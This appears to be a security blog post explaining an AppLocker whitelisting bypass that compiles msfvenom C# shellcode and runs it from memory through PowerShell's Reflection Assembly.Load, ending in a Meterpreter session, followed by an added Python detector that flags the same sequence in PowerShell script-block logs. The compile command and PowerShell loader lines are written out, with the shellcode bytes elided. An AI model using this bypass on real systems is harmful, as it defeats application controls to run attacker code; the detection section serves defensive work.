Even in an environment where AppLocker is enabled, it is possible to run an executable because of the way assemblies are loaded in .NET applications. This bypass method was discovered by Casey Smith and presented at ShmooCon 2015. The Assembly Load method can load an assembly from three different locations:

  • Memory (as a Byte[] array)
  • A location on disk
  • A URL

The .NET assembly is initially loaded with Read permissions in order to enumerate the methods and properties of the binary; the permissions are then changed to Execute, so AppLocker or any other whitelisting application cannot identify that something was executed on the system.

Bypassing AppLocker with this method consists of three steps:

  • Generate C# ShellCode
  • Compile the .NET application
  • Execute ShellCode from Memory with Assembly Load

Metasploit's msfvenom can be used to generate C# shellcode:

Figure: C# Shellcode Generation

The shellcode above can be embedded in the C# source file, which is then compiled with the csc utility (part of the .NET Framework) to produce the executable.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 /out:shellcode.exe shellcode.cs

Figure: Compiling C# Code to Executable

Running the executable directly or from PowerShell will fail, since this binary is not whitelisted by an AppLocker rule.

Figure: AppLocker Rule - Block Executables

Figure: AppLocker Rule - Block ShellCode Binary

However, this restriction can be bypassed by using the assembly loading method from PowerShell to execute, directly from memory, the shellcode that is contained in the file and defined as a method.

public class Shellcode
{
    public static void Exec()
    {
        // native function's compiled code
        byte[] shellcode = new byte[354] {
            // ... the 354 shellcode bytes are elided on the page ...
        };
    }
}

The following needs to be executed from PowerShell:

$bytes = [System.IO.File]::ReadAllBytes("C:\shellcode.exe")
[Reflection.Assembly]::Load($bytes)
[Shellcode]::Exec()

Figure: Assembly Load

The shellcode will be executed and a Meterpreter session will open.

Figure: Meterpreter - Shellcode
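From the defender's side, the PowerShell sequence above leaves a recognisable trace in Script Block Logging (PowerShell Event ID 4104): a file read into a byte array, Assembly.Load called on those bytes rather than on an assembly name, and a static method invoked on the newly loaded type. The following Python snippet is an added example, not part of the original post, that triages script block texts for that chain; the indicator names, the ratings and the sample blocks are constructed for the example.

```python
import re

# Indicators taken from the PowerShell sequence shown above: a file read into a
# byte array, Assembly.Load called on bytes rather than on an assembly name,
# and a static method invoked on the freshly loaded type.
INDICATORS = {
    "read_all_bytes": re.compile(r"\[System\.IO\.File\]::ReadAllBytes\s*\(", re.I),
    # Load("Name") resolves an assembly by name and is routine; Load($var) or
    # Load([byte[]]...) is the in-memory variant that never touches the disk.
    "load_from_bytes": re.compile(
        r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(\s*(?:\$\w+|\[byte\[\]\])", re.I),
    "static_invoke": re.compile(r"\[(\w+)\]::(\w+)\s*\(\s*\)"),
}

def indicators_in(script_block):
    """Return the sorted indicator names found in one 4104 ScriptBlockText value."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(script_block))

def classify(script_block):
    """Rate one block: 'high' when the full read-then-load chain is present,
    'medium' for a bytes/variable Assembly.Load on its own, 'none' otherwise."""
    hits = indicators_in(script_block)
    if "load_from_bytes" not in hits:
        return "none"
    if "read_all_bytes" in hits:
        return "high"
    return "medium"

# Constructed sample script block texts (not real log data) as they would
# appear in the ScriptBlockText field of PowerShell Event ID 4104.
SAMPLE_SCRIPT_BLOCKS = [
    # benign: loading a framework assembly by name
    '[Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")',
    # the sequence from the post, logged as one block
    '$bytes = [System.IO.File]::ReadAllBytes("C:\\shellcode.exe")\n'
    '[Reflection.Assembly]::Load($bytes)\n'
    '[Shellcode]::Exec()',
    # the in-memory load on its own, bytes prepared elsewhere
    '[Reflection.Assembly]::Load($data) | Out-Null',
]

def triage(blocks=SAMPLE_SCRIPT_BLOCKS):
    """Map each block to (rating, matched indicators); alert on 'high' and 'medium'."""
    return [(classify(b), indicators_in(b)) for b in blocks]

if __name__ == "__main__":
    for rating, hits in triage():
        print(rating, hits)
```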

Resources

https://github.com/subTee/ShmooCon-2015
